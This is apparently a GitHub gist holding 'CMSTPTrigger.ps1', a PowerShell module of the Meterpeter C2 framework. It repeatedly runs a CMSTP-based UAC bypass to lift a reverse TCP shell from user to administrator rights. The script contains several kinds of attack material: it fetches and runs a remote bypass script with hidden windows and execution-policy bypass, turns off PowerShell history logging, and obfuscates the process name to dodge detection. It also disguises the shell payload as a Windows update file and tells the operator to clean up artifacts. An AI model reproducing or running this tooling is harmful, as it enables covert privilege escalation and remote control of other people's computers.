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Last active October 13, 2022 01:42
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UAC Bypass POC using SendKeys! - UACBypassCMSTP.ps1 auxiliary module
CmdLet to loop UACBypassCMSTP.ps1 execution!
Author: @r00t-3xp10it
Tested Under: Windows 10 (19043) x64 bits
Required Dependencies: UACBypassCMSTP.ps1 {auto}
Optional Dependencies: none
PS cmdlet Dev version: v1.1.5
This cmdlet its a module of @Meterpeter C2 v2.10.11.15 release, that allow
meterpeter users to elevate session shell privileges from UserLand to Admin.
By default it downloads\executes 'UACBypassCMSTP.ps1' from %TMP% directory,
that for is turn executes the reverse tcp shell ( only PS1 scripts ) from
sellected location. That location can be set using -RatLocation parameter.
.Parameter DelayTime
Seconds to delay UACBypassCMSTP.ps1 execution (default: 30)
.Parameter LoopFor
How Many times do we execute the loop function? (default: 2)
.Parameter RatLocation
Path of script to exec (default: $Env:TMP\Update-KB5005101.ps1)
PS C:\> .\CMSTPTrigger.ps1 -DelayTime "60"
Execute 'UACBypassCMSTP.ps1' after 60 seconds.
PS C:\> .\CMSTPTrigger.ps1 -DelayTime "60" -LoopFor "5"
Execute UACBypassCMSTP.ps1 at each '60' seconds, a max of '5' times.
PS C:\> .\CMSTPTrigger.ps1 -DelayTime "10" -LoopFor "3" -RatLocation "$Env:USERPROFILE\Desktop\rat.ps1"
Execute UACBypassCMSTP.ps1 at each '10' seconds that exec -RatLocation '<string'>, a max of '3' times.
* Elevate session from UserLand to Administrator!
=> Download: UACBypassCMSTP from GitHub into %TMP% ..
MaxExec DelayTime RatLocation
------- --------- -------------
2 30(sec) C:\Users\pedro\AppData\Local\Temp\Update-KB5005101.ps1
* Exit @meterpeter and start a new handler to recive the elevated shell.
=> Remenber: To manual delete artifacts from 'TMP' dir after escalation.
[CmdletBinding(PositionalBinding=$false)] param(
$TryFor = $LoopFor+1
$FailedExecution = "False"
$GostavasDeSaber = "@m_tp"
$ErrorActionPreference = "SilentlyContinue"
#Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
$NoStringsForYou = ($GostavasDeSaber).Replace("@","c").Replace("_","s")
Write-Host "* Elevate session from UserLand to Administrator!" -ForegroundColor Green
If(-not(Test-Path -Path "$Env:TMP\UACBypassCMSTP.ps1"))
#Download CmdLet from my GitHub repository into %tmp% directory.
Write-Host " => Downloading: UACBypassCMSTP from GitHub into %TMP% .." -ForeGroundColor Blue
iwr -Uri "" -OutFile "$Env:TMP\UACBypassCMSTP.ps1"|Out-Null
If($RatLocation -ne "False")
If($RatLocation -iNotMatch '(.ps1)$')
$RatLocation = "$Env:TMP\Update-KB5005101.ps1"
Write-Host " => Error: This function only accepts .PS1 scripts .." -ForegroundColor Red -BackgroundColor Black
Write-Host " => Using default value: `$Env:TMP\Update-KB5005101.ps1`n" -ForegroundColor Blue
#Replace RatLocation on UACBypassCMSTP cmdlet?
((Get-Content -Path "$Env:TMP\UACBypassCMSTP.ps1" -Raw) -Replace '\$Env:TMP\\Update-KB5005101.ps1',"$RatLocation")|Set-Content -Path "$Env:TMP\UACBypassCMSTP.ps1"
#Use default RatLocation Parameter declaration.
$RatLocation = "$Env:TMP\Update-KB5005101.ps1"
for($i=1; $i -lt $TryFor; $i++)
Author: @r00t-3xp10it
Helper - For() function to loop for sellected amount of times.
The UACBypassCMSTP.ps1 CmdLet executes Update-KB50005101.ps1
reverse tcp shell each time that loops, with sellected time delay.
CmdLet will check cm`stp process state and CorpVpn network adapter
profile, before each loop exec to prevent adapter gui from pop up.
Start-Sleep -Seconds $DelayTime
#Make sure cms`tp process its not runing!
If((Get-Process -Name $NoStringsForYou -EA silentlycontinue).Responding -Match '^(True)$')
Stop-Process -Name $NoStringsForYou -Force
Start-Sleep -Milliseconds 1500
#Make sure CorpVpn network adapter profile its not active!
$CorpVpnAdapterState = Get-NetAdapter | ? { $_.Name -like "*CorpVpn*" }
If(-not($CorpVpnAdapterState) -or $CorpVpnAdapterState -ieq $null)
#Make sure we dont have a session allready open before exec EOP again!
$readLog = Get-Content -Path "$Env:TMP\EOPsettings.log" -EA SilentlyContinue
If(-not($readLog) -or $readLog -ieq $null)
$ShellConnection = $null
$ShellConnection = netstat -ano|Findstr /C:"$readLog"
If(-not($ShellConnection) -or $ShellConnection -ieq $null)
#Execute EOP script without rebooting!
powershell -exec bypass -WindowStyle hidden -File "$Env:TMP\UACBypassCMSTP.ps1"
}catch{$FailedExecution = "True"
Write-Host "[x] Error: fail to execute '$Env:TMP\UACBypassCMSTP.ps1' (EOP)" -ForegroundColor Red -BackgroundColor Black
Write-Host "`n";exit #Exit @CMSTPTrigger
#Build output DataTable!
$mytable = New-Object System.Data.DataTable
#Adding values to DataTable!
$mytable.Rows.Add("$LoopFor", ## max eop executions
"$DelayTime(sec)", ## Looop each <int> seconds
"$RatLocation" ## rat client absoluct path
#Diplay output DataTable!
$mytable | Format-Table -AutoSize | Out-String -Stream | ForEach-Object {
$stringformat = If($_ -Match '^(MaxExec)'){
@{ 'ForegroundColor' = 'Green' } }Else{ @{} }
Write-Host @stringformat $_
#Final stdout displays
If($FailedExecution -ieq "False")
Write-Host "* Exit @Meterpeter and start a new handler to recive the elevated shell." -ForegroundColor Green
Write-Host " => Remenber: To manual delete artifacts from 'TMP' dir after escalation.`n" -ForegroundColor Blue
Remove-Item -Path "$Env:TMP\EOPsettings.log" -Force
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r00t-3xp10it commented Dec 28, 2021

   CmdLet to loop UACBypassCMSTP.ps1 execution!

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: UACBypassCMSTP.ps1 {auto}
   Optional Dependencies: none
   PS cmdlet Dev version: v1.1.5

   This cmdlet its a module of @Meterpeter C2 v2.10.11.15 release, that allow 
   meterpeter users to elevate session shell privileges from UserLand to Admin. 

   By default it downloads\executes 'UACBypassCMSTP.ps1' from %TMP% directory,
   that for is turn executes the reverse tcp shell ( only PS1 scripts ) from
   sellected location. That location can be set using -RatLocation parameter.

.Parameter DelayTime
   Seconds to delay UACBypassCMSTP.ps1 execution (default: 30)

.Parameter LoopFor
   How Many times do we execute the loop function? (default: 2)

.Parameter RatLocation
   Path of script to exec (default: $Env:TMP\Update-KB5005101.ps1)

   PS C:\> .\CMSTPTrigger.ps1 -DelayTime "60"
   Execute 'UACBypassCMSTP.ps1' after 60 seconds.

   PS C:\> .\CMSTPTrigger.ps1 -DelayTime "60" -LoopFor "5"
   Execute UACBypassCMSTP.ps1 at each '60' seconds, a max of '5' times.

   PS C:\> .\CMSTPTrigger.ps1 -DelayTime "10" -LoopFor "3" -RatLocation "$Env:USERPROFILE\Desktop\rat.ps1"
   Execute UACBypassCMSTP.ps1 at each '10' seconds that exec -RatLocation '<string'>, a max of '3' times.

   * Elevate session from UserLand to Administrator!
      => Download: UACBypassCMSTP from GitHub into %TMP% ..

   MaxExec  DelayTime  RatLocation
   -------  ---------  -------------
   2        30(sec)    C:\Users\pedro\AppData\Local\Temp\Update-KB5005101.ps1

   * Exit @meterpeter and start a new handler to recive the elevated shell.
     => Remenber: To manual delete artifacts from 'TMP' dir after escalation.


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